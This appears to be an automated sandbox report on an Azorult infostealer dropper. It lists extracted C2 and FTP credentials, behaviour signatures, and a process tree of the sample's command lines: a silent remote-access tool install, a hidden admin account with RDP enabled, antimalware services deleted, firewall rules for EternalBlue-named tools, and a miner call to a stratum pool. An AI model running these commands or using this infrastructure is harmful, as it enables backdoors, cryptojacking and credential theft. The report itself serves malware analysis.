Analysis

  • max time kernel
    1806s
  • max time network
    1821s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-11-2020 14:34

Malware Config

Extracted

Credentials

Protocol: ftp

Host: 109.248.203.81

Port: 21

Username: alex

Password: easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer ⋅ 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass ⋅ 3 TTPs
  • Windows security bypass ⋅ 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software ⋅ 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges ⋅ 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload ⋅ 2 IoCs
  • ASPack v2.12-2.42 ⋅ 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory ⋅ 4 IoCs
  • Executes dropped EXE ⋅ 18 IoCs
  • Modifies Windows Firewall ⋅ 1 TTPs
  • Registers new Print Monitor ⋅ 2 TTPs
  • Sets file to hidden ⋅ 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) ⋅ 3 TTPs
  • UPX packed file ⋅ 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL ⋅ 4 IoCs
  • Modifies file permissions ⋅ 1 TTPs 64 IoCs
  • Reads data files stored by FTP clients ⋅ 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients ⋅ 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients ⋅ 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 4 IoCs
  • Checks installed software on the system ⋅ 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled ⋅ 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 ⋅ 1 TTPs
  • Looks up external IP address via web service ⋅ 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon ⋅ 2 TTPs 6 IoCs
  • autoit_exe ⋅ 8 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory ⋅ 26 IoCs
  • Drops file in Windows directory ⋅ 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) ⋅ 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry ⋅ 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe ⋅ 8 IoCs
  • Gathers network information ⋅ 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill ⋅ 6 IoCs
  • Modifies data under HKEY_USERS ⋅ 18 IoCs
  • Modifies registry class ⋅ 6 IoCs
  • Modifies system certificate store ⋅ 2 TTPs 6 IoCs
  • NTFS ADS ⋅ 2 IoCs
  • Runs .reg file with regedit ⋅ 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam ⋅ 1 IoCs
  • Suspicious behavior: LoadsDriver ⋅ 1 IoCs
  • Suspicious behavior: SetClipboardViewer ⋅ 1 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 13 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs
  • System policy modification ⋅ 1 TTPs 3 IoCs
  • Views/modifies file attributes ⋅ 1 TTPs 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    Modifies system certificate store
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1924
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:200
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:1336
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:1016
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2072
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:1596
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3868
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:752
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:1584
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:3332
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:3588
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:3504
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:3392
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:1920
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:3876
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:1420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:3612
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:496
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:2060
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:3796
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:3728
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:3804
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:1420
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3844
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:3328
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:2992
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:2528
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:4328
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4340
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4564
          • C:\ProgramData\WindowsTask\audiodg.exe
            C:\ProgramData\WindowsTask\audiodg.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:5396
          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
            C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:5292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:792
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            PID:2324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:3320
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:3932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:3024
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            PID:3720
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:3924
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:3852
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:3212
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:3992
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:3712
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:3812
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:3408
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:636
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:2068
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:1840
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4128
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:4208
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:4452
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:4540
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:4588
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:544
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:4720
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:4848
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:4264
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4376
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4176
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:1196
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:4908
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4904
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:4524
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4732
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4656
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4716
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:5032
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4792
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:2388
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:1356
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:4332
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4300
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:744
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:2744
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:4560
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:2076
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:2528
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Views/modifies file attributes
                    PID:5056
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Views/modifies file attributes
                    PID:4104
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:4988
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:3764
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:3732
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:64
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:2516
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:3928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:2332
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:3824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:2088
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:3996
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:940
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:2908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:1636
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:2824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:1612
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:2896
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:3816
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:1616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:3520
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:3916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:3880
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:4112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:4240
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4392
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:4252
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4428
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:4512
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:4620
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:4664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:4688
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:4736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4756
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:4820
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:4832
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4952
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:4852
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:5004
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:5060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:5080
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:3808
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:4180
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4348
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4488
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4316
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4328
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4516
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4500
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4644
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:2924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4972
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:5096
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:1044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4624
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:4996
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:2288
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:4480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4592
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:3688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:4296
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:5028
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:3484
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:5104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:4892
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:2564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:4744
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:3548
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:4060
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:4604
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4668
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:5116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:4272
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:4224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:4764
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4472
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:5020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:4196
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
            PID:4692
